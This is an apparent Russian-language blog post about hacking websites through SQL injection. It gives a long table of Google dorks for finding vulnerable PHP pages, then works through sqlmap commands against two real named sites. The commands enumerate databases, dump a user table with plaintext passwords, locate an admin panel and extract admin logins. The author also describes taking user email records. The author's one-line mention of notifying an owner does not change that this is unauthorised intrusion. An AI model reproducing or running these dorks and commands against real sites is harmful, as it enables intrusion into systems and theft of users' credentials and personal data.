Взлом сайта с помощью SQL-инъекции.
| Google Dork string Column 1 | Google Dork string Column 2 | Google Dork string Column 3 |
| inurl:item_id= |
inurl:review.php?id= |
inurl:hosting_info.php?id= |
| inurl:newsid= |
inurl:iniziativa.php?in= |
inurl:gallery.php?id= |
| inurl:trainers.php?id= |
inurl:curriculum.php?id= |
inurl:rub.php?idr= |
| inurl:news-full.php?id= |
inurl:labels.php?id= |
inurl:view_faq.php?id= |
| inurl:news_display.php?getid= |
inurl:story.php?id= |
inurl:artikelinfo.php?id= |
| inurl:index2.php?option= |
inurl:look.php?ID= |
inurl:detail.php?ID= |
| inurl:readnews.php?id= |
inurl:newsone.php?id= |
inurl:index.php?= |
| inurl:top10.php?cat= |
inurl:aboutbook.php?id= |
inurl:profile_view.php?id= |
| inurl:newsone.php?id= |
inurl:material.php?id= |
inurl:category.php?id= |
| inurl:event.php?id= |
inurl:opinions.php?id= |
inurl:publications.php?id= |
| inurl:product-item.php?id= |
inurl:announce.php?id= |
inurl:fellows.php?id= |
| inurl:sql.php?id= |
inurl:rub.php?idr= |
inurl:downloads_info.php?id= |
| inurl:index.php?catid= |
inurl:galeri_info.php?l= |
inurl:prod_info.php?id= |
| inurl:news.php?catid= |
inurl:tekst.php?idt= |
inurl:shop.php?do=part&id= |
| inurl:index.php?id= |
inurl:newscat.php?id= |
inurl:productinfo.php?id= |
| inurl:news.php?id= |
inurl:newsticker_info.php?idn= |
inurl:collectionitem.php?id= |
| inurl:index.php?id= |
inurl:rubrika.php?idr= |
inurl:band_info.php?id= |
| inurl:trainers.php?id= |
inurl:rubp.php?idr= |
inurl:product.php?id= |
| inurl:buy.php?category= |
inurl:offer.php?idf= |
inurl:releases.php?id= |
| inurl:article.php?ID= |
inurl:art.php?idm= |
inurl:ray.php?id= |
| inurl:play_old.php?id= |
inurl:title.php?id= |
inurl:produit.php?id= |
| inurl:declaration_more.php?decl_id= |
inurl:news_view.php?id= |
inurl:pop.php?id= |
| inurl:pageid= |
inurl:select_biblio.php?id= |
inurl:shopping.php?id= |
| inurl:games.php?id= |
inurl:humor.php?id= |
inurl:productdetail.php?id= |
| inurl:page.php?file= |
inurl:aboutbook.php?id= |
inurl:post.php?id= |
| inurl:newsDetail.php?id= |
inurl:ogl_inet.php?ogl_id= |
inurl:viewshowdetail.php?id= |
| inurl:gallery.php?id= |
inurl:fiche_spectacle.php?id= |
inurl:clubpage.php?id= |
| inurl:article.php?id= |
inurl:communique_detail.php?id= |
inurl:memberInfo.php?id= |
| inurl:show.php?id= |
inurl:sem.php3?id= |
inurl:section.php?id= |
| inurl:staff_id= |
inurl:kategorie.php4?id= |
inurl:theme.php?id= |
| inurl:newsitem.php?num= |
inurl:news.php?id= |
inurl:page.php?id= |
| inurl:readnews.php?id= |
inurl:index.php?id= |
inurl:shredder-categories.php?id= |
| inurl:top10.php?cat= |
inurl:faq2.php?id= |
inurl:tradeCategory.php?id= |
| inurl:historialeer.php?num= |
inurl:show_an.php?id= |
inurl:product_ranges_view.php?ID= |
| inurl:reagir.php?num= |
inurl:preview.php?id= |
inurl:shop_category.php?id= |
| inurl:Stray-Questions-View.php?num= |
inurl:loadpsb.php?id= |
inurl:transcript.php?id= |
| inurl:forum_bds.php?num= |
inurl:opinions.php?id= |
inurl:channel_id= |
| inurl:game.php?id= |
inurl:spr.php?id= |
inurl:aboutbook.php?id= |
| inurl:view_product.php?id= |
inurl:pages.php?id= |
inurl:preview.php?id= |
| inurl:newsone.php?id= |
inurl:announce.php?id= |
inurl:loadpsb.php?id= |
| inurl:sw_comment.php?id= |
inurl:clanek.php4?id= |
inurl:pages.php?id= |
| inurl:news.php?id= |
inurl:participant.php?id= |
|
| inurl:avd_start.php?avd= |
inurl:download.php?id= |
|
| inurl:event.php?id= |
inurl:main.php?id= |
|
| inurl:product-item.php?id= |
inurl:review.php?id= |
|
| inurl:sql.php?id= |
inurl:chappies.php?id= |
|
| inurl:material.php?id= |
inurl:read.php?id= |
|
| inurl:clanek.php4?id= |
inurl:prod_detail.php?id= |
|
| inurl:announce.php?id= |
inurl:viewphoto.php?id= |
|
| inurl:chappies.php?id= |
inurl:article.php?id= |
|
| inurl:read.php?id= |
inurl:person.php?id= |
|
| inurl:viewapp.php?id= |
inurl:productinfo.php?id= |
|
| inurl:viewphoto.php?id= |
inurl:showimg.php?id= |
|
| inurl:rub.php?idr= |
inurl:view.php?id= |
|
| inurl:galeri_info.php?l= |
inurl:website.php?id= |
Для начала, ищем уязвимые сайты при помощи гугл-дорков.
Они собраны в таблице выше. Гугель нам шото выдал.

Первый в списке выдачи, футбольный сайт. Вот его и проверим при помощи одиночной кавычки ', вставив её в конце ссылки в адресной строке. Адрес выглядит так http://italyfutbol.ru/rubrika.php?id=11, потом, вот так

Сайтина ответила ошибкой на запрос. Это значит, что страница уязвима для SQLMAP SQL-инъекции.

Сейчас нужно построить список всех баз данных уязвимой СУБД. Для атаки, буду использовать программулину SQLMAP, она также скажет мне, какая переменная является уязвимой.
Запустим следующую команду в отношении уязвимого веб-сайта.
sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 --dbs

Паняслася....

Эта команда раскрыла совсем немного интересной информации. Начинаем лазить по базам данных в поиске администратора, суперюсера, чтоб потырить пароль владельца сайта.
Нам нужно знать как много таблиц имеется в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполняем следующую команду:
sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 -D allrecords --tables
Ни админа или администратора, ничего похожего не найдено. Зато, вот чего нашлось!

Попробуем вскрыть юзер-лист. Вводим команду
sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 -D allrecords -T userlist --columns
И получаем интересный результат.

Ага! Это именно то, что искала. А именно, в этой таблице содержится логин с паролем. Проводим следующую инъекцию командой
sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 -D allrecords -T userlist --dump

Ебааать ту Люсю! Пароль в незашифрованном виде! У предыдущего сайта, был выдан хеш пароля.

Следующий шаг, надо найти админку данного сайта. Гуглить не стала, у мну есть программулина поиска админок.

Нашла одну админку.

Вот в общем то и всё! Сайт захвачен. Написала владельцу о взломе и шоп как можно быстрей устранил уязвимость и поменял пароль в админке.
Эта команда, сливает всю базу почт зарегистрированных пользователей на сайте. База уже с другого ресурса.
sqlmap -u www.pulset.ru/club/rubrika.php?id_ru=81 -D club_media -T t_admin -C login --dump

для примера несколько взяла.

хватит и трёх. Их там несколько сотен.

Исследую утилиту дальше, интересно же, каковы её возможности.
Комментарии